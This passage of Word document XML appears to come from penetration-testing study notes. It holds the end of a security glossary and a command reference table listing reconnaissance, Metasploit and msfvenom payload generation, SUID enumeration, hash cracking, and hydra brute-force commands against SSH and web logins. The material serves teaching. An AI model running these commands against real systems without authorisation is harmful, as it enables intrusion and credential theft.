          <w:tcPr>
            <w:tcW w:type="dxa" w:w="721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Open Web Application Security Project — publisher of the Top 10 and the Web Security Testing Guide</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="721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The code that runs on a target after a successful exploit (e.g. a shell or Meterpreter session)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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Privilege escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="721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Converting limited access into higher (ideally root/SYSTEM) privileges on a system</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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PTES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="721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Penetration Testing Execution Standard — a 7-stage professional testing methodology</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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Rainbow table</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="721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 precomputed hash-to-plaintext lookup table used to speed up cracking of unsalted hashes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="721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The information-gathering phase of an engagement, passive or active</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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RoE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="721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Rules of Engagement — the agreed testing window, allowed techniques and escalation process for an engagement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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Salt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="721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Random data added to a password before hashing so identical passwords yield different hashes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="721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The precise, written list of systems a tester is (and is not) authorised to test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="721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Inserting attacker-controlled input into a database query to change its logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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SUID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="721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 file permission bit causing a program to run with its owner's (often root) privileges regardless of the caller</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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VAPT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="721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Vulnerability Assessment and Penetration Testing — combines broad automated scanning with deep manual exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="253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Write blocker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="721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(Forensics-adjacent term, included for completeness) A device/setting preventing writes to evidence media — not core to this subject but occasionally referenced alongside chain-of-custody discussions in VAPT evidence handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2534"/>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XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7212"/>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Cross-Site Scripting — injecting attacker-controlled script that executes in a victim's browser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2534"/>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Zero-day</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7212"/>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 vulnerability unknown to the vendor and with no official patch available at time of use</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Consolidated Command Reference</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3898"/>
        <w:gridCol w:w="5848"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3898"/>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Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5848"/>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What it does</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3898"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">whois target.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5848"/>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Domain registration lookup</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3898"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">dig target.com A/MX/NS/TXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5848"/>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DNS record queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3898"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">dig axfr target.com @ns1.target.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5848"/>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Attempt a DNS zone transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3898"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">theHarvester -d target.com -b all</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5848"/>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Aggregate OSINT from multiple sources</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3898"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">nmap -sS -sV -O -p- &lt;ip&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5848"/>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Full SYN scan with version/OS detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3898"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">nmap --script=vuln &lt;ip&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5848"/>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NSE vulnerability sweep</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3898"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">nc -nv &lt;ip&gt; &lt;port&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5848"/>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Manual banner grabbing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3898"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">enum4linux -a &lt;ip&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5848"/>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Full SMB enumeration sweep</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3898"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">msfconsole</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5848"/>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Start the Metasploit Framework console</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3898"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">search</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">use</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">show options</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">set</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">run</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5848"/>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Core msfconsole workflow</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3898"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">msfvenom -p &lt;payload&gt; LHOST=... LPORT=... -f exe -o out.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5848"/>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Generate a standalone payload file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3898"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo -l</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5848"/>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List current user's allowed sudo commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3898"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">find / -perm -4000 -type f 2&gt;/dev/null</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5848"/>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List SUID binaries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3898"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">john --wordlist=rockyou.txt hashes.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5848"/>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Dictionary attack on a hash file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3898"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">hashcat -m 0 -a 0 hashes.txt rockyou.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5848"/>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GPU-accelerated hash cracking (mode 0 = MD5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3898"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">hydra -l user -P wordlist ssh://&lt;ip&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5848"/>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Online brute force against SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3898"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="90"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">hydra ... http-post-form "..."</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5848"/>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Online brute force against an HTTP login form</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="240" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Consolidated Tool &amp; Technique Comparison</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2339"/>
        <w:gridCol w:w="1949"/>
        <w:gridCol w:w="5458"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2339"/>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Tool / Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
